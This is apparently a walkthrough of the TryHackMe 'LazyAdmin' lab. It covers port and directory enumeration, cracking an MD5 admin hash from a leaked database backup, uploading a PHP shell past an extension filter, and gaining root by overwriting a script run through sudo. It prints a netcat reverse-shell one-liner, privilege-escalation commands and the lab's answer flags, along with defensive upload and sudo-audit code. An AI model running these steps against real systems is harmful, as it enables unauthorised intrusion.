
LazyAdmin - writeup

TryHackMe - LazyAdmin

 


 NMAP - Network mapping

 #command - nmap -sT -vv -sC -sV 10.10.126.215

 

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE=
|   256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe/TbqqjC/bQMfBM29kV2xApQbhUXLFwFJPU14Y9/Nm
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Here, ports 22 and 80 are open.

HTTP

We can conclude that an HTTP service is running on the machine. Let's check that service and start enumerating it.


 

Enumeration 

For enumeration, we are going to find the hidden directories of the web server using our favorite tool, gobuster.

#Command - gobuster dir -u http://10.10.126.215  -w /usr/share/dirb/wordlists/common.txt -x txt,php

 

Here, we found a hidden directory: /content

 

 

Again, we run gobuster to find hidden directories, this time under /content.

#Command - gobuster dir -u http://10.10.126.215/content  -w /usr/share/dirb/wordlists/common.txt -x txt,php

/images
/inc
/index.php
/index.php

 

After the gobuster scan we found some interesting folders. One of them, /inc, is really interesting, so let's check what it has.

 


Here there are DB-related files. Let's check the mysqlbackup folder. It contains a MySQL backup file; let's download it and see whether it has any interesting information.

 


Here I found the credentials for login:

The username is manager and the password is stored as an MD5 hash. MD5 is a hash, not encryption, so instead of decrypting it we look the hash up in an online MD5 lookup service, and I found the password.

Link: https://crackstation.net/

 

Try CrackStation.


 

 

Let's check the hidden directory /as and log in to the page.
 



We are in the admin page. Now let’s try to upload our shell.

Navigate to Media -> Upload. I tried to upload the .php shell, but the web application refused this extension. So change .php5 to .phtml and upload.

 


Click shell.php5. Now start a listener on our machine, and we've got our shell.

nc -lvnp <port>
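
The upload step above works because the filter refuses one extension and lets the others through. As an added example (not code from the CMS or from this writeup), here is that kind of blocklist next to an allowlist check that also discards the client-supplied name; the BLOCKED and ALLOWED sets and all function names are assumptions made for illustration.

```python
import os
import uuid

# Assumed filter behaviour: the writeup only says ".php" was refused while
# another PHP-handled extension was accepted, which is what a blocklist does.
BLOCKED = {"php"}
# Hypothetical allowlist for a media library.
ALLOWED = {"jpg", "jpeg", "png", "gif"}

def blocklist_accepts(filename):
    """Weak check: reject only the extensions someone remembered to list."""
    return filename.rsplit(".", 1)[-1].lower() not in BLOCKED

def allowlist_extension(filename):
    """Return the normalised extension if the name is acceptable, else None."""
    name = os.path.basename(filename.replace("\\", "/")).strip().lower()
    stem, dot, ext = name.rpartition(".")
    # Require exactly one dot, a non-empty stem and an allowlisted extension.
    if not dot or not stem or "." in stem or ext not in ALLOWED:
        return None
    return ext

def stored_name(filename):
    """Server-chosen name for an accepted upload; the client's name is dropped."""
    ext = allowlist_extension(filename)
    if ext is None:
        raise ValueError("upload rejected: %r" % filename)
    return "%s.%s" % (uuid.uuid4().hex, ext)

def compare(names):
    """(name, blocklist verdict, allowlist verdict) for each candidate name."""
    return [(n, blocklist_accepts(n), allowlist_extension(n) is not None)
            for n in names]

if __name__ == "__main__":
    # Constructed sample names, using the extensions mentioned in the writeup.
    for row in compare(["shell.php", "shell.php5", "shell.phtml", "photo.PNG"]):
        print(row)
```

The extension check is only one layer: the upload directory should also be configured so the web server never executes files from it.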



User flag

# cd /home
# ls
itguy
# cd itguy
# ls
# cat user.txt
THM{63e5bce9271952aad1113b6f1ac28a07} 

Now let's try to get root. We're going to spawn a TTY using this Python one-liner:

# python -c 'import pty;pty.spawn("/bin/bash")'

 

Privilege Escalation

Then run sudo -l to check which commands we can run as root.
 
 www-data@THM-Chal:/home/itguy$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
 
 
We can run /usr/bin/perl on the file backup.pl as root without a password. Let's check the content of backup.pl.

www-data@THM-Chal:/home/itguy$ cat backup.pl
cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

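We don't need a reverse shell here. www-data can write to /etc/copy.sh, and backup.pl runs that file as root through sudo, so we just put a command in it and execute it.

Root flag

Let's check here: https://guif.re/linuxeop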

www-data@THM-Chal:/home/itguy$ cd /etc
cd /etc
www-data@THM-Chal:/etc$ echo 'exec "/bin/sh"' > copy.sh
echo 'exec "/bin/sh"' > copy.sh
www-data@THM-Chal:/etc$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl
# whoami
whoami
root
# cd /root
cd /root
# cat root.txt
cat root.txt
THM{6637f41d0177b6f37cb20d775124699f}
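
The escalation above depends on one thing: a file reachable from a NOPASSWD sudo entry is writable by an unprivileged user. As an added example (not part of the original writeup), this audit follows the chain from `sudo -l` output through every script it names and reports files that a non-root user could modify. The function names, the `root` prefix argument and the file modes in `demo()` are assumptions; the writeup does not show the real permissions.

```python
import os, re, stat, tempfile

# Absolute paths such as /etc/copy.sh in sudo output or in a script body.
PATH_RE = re.compile(r"(?<![\w./])/(?:[\w.+-]+/)*[\w.+-]+")

def nopasswd_paths(sudo_l):
    """Absolute paths named after NOPASSWD: in `sudo -l` output."""
    return [p for line in sudo_l.splitlines() if "NOPASSWD:" in line
            for p in PATH_RE.findall(line.split("NOPASSWD:", 1)[1])]

def weakness(real_path, trusted_uids):
    """Why a file is unsafe in a root-run chain (None if it looks fine)."""
    st = os.stat(real_path)
    if st.st_uid not in trusted_uids:
        return "owned by untrusted uid %d" % st.st_uid
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group/other writable, mode %o" % stat.S_IMODE(st.st_mode)

def audit_chain(sudo_l, root="/", trusted_uids=(0,)):
    """Follow files reachable from NOPASSWD entries; return {path: reason}."""
    todo, seen, findings = nopasswd_paths(sudo_l), set(), {}
    while todo:
        path = todo.pop()
        real = os.path.join(root, path.lstrip("/"))
        if path in seen or not os.path.isfile(real):
            continue
        seen.add(path)
        reason = weakness(real, trusted_uids)
        if reason:
            findings[path] = reason
        with open(real, "rb") as fh:
            body = fh.read(65536)
        if b"\0" not in body:  # scan text scripts only, not ELF binaries
            todo += PATH_RE.findall(body.decode("utf-8", "replace"))
    return findings

def demo(copy_sh_mode=0o646):
    """Constructed copy of the writeup's layout in a temp dir; modes are assumed."""
    root = tempfile.mkdtemp()
    for rel, text, mode in (
            ("home/itguy/backup.pl", '#!/usr/bin/perl\nsystem("sh", "/etc/copy.sh");\n', 0o644),
            ("etc/copy.sh", "echo backup\n", copy_sh_mode)):
        real = os.path.join(root, rel)
        os.makedirs(os.path.dirname(real), exist_ok=True)
        with open(real, "w") as fh:
            fh.write(text)
        os.chmod(real, mode)
    return audit_chain("    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl\n",
                       root, {os.getuid()})
```

On a real host, call `audit_chain()` as root with the output of `sudo -l -U <user>` and the default `root="/"`; any path in the result should be made root-owned and not writable by group or other, or removed from the sudoers entry.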


 

 

 
